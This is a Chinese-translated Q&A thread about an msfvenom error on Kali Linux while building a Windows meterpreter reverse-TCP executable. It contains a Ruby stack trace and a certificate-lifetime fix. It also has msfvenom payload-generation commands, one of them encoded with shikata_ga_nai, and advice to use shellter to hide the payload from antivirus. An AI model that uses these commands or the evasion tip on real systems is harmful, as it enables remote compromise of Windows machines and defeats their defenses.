【问题标题】:Kali Linux - MSFVenom Payload Creation ErrorKali Linux - MSFVenom 有效负载创建错误
【发布时间】:2018-09-19 12:26:06
【问题描述】:

所以我刚刚在我的戴尔 Inspiron 灵越 5000 系列英特尔酷睿 I5(第 8 代)上安装了 Kali Linux Rolling!当我尝试在 MSFVenom(黑客操作系统附带的最佳有效负载创建工具之一)中创建 Windows 反向 TCP 有效负载时,我遇到了一个错误。这是我输入的:

root@GetOffMyLawnBish:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

这就是我得到的:

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

有人知道这里发生了什么吗?请告诉我!

哦,顺便说一句,我已经创建了一个公共负载,这将是我的本地负载,但奇怪的是,公共负载完成后没有任何问题,但是一旦我将 IPAddress 更改为我的本地一个它给了我一个错误:(。

【问题讨论】:

标签: linux windows metasploit


【解决方案1】:

这是在 32 位版本上出现的问题。如果没关系,请尝试使用 64 位版本。

如果您必须使用 32 位,那么您可以更改 /usr/share/metasploit-framework/lib/msf/core/payload/android.rb 文件(在第 87 行左右)

cert.not_after = cert.not_before + 3600*24*365*20 # 20 years

cert.not_after = cert.not_before + 3600*24*365*2 # 2 years

请记住,这可能会影响对 android payloads 的依赖。

【讨论】:

    【解决方案2】:

    即使使用编码器,最简单的病毒扫描程序和本机 Windows 扫描程序也会获取此有效负载并疯狂地发出危险信号。

    我建议您下载 shellter 并使用它将您的有效负载隐藏在 Windows 允许通过的可执行文件中。几乎任何事情都会奏效。

    另外,它只是让您使用数字多项选择来选择有效负载。

    简单有效

    【讨论】:

      【解决方案3】:

      可以在命令下运行。

      msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe > 恶意文件.exe

      【讨论】:

      • 这个答案只是陈述了提问者所说的完全一样的东西不起作用....
      猜你喜欢
      • 2019-02-27
      • 2021-01-06
      • 2014-12-05
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 2018-04-17
      • 1970-01-01
      相关资源
      最近更新 更多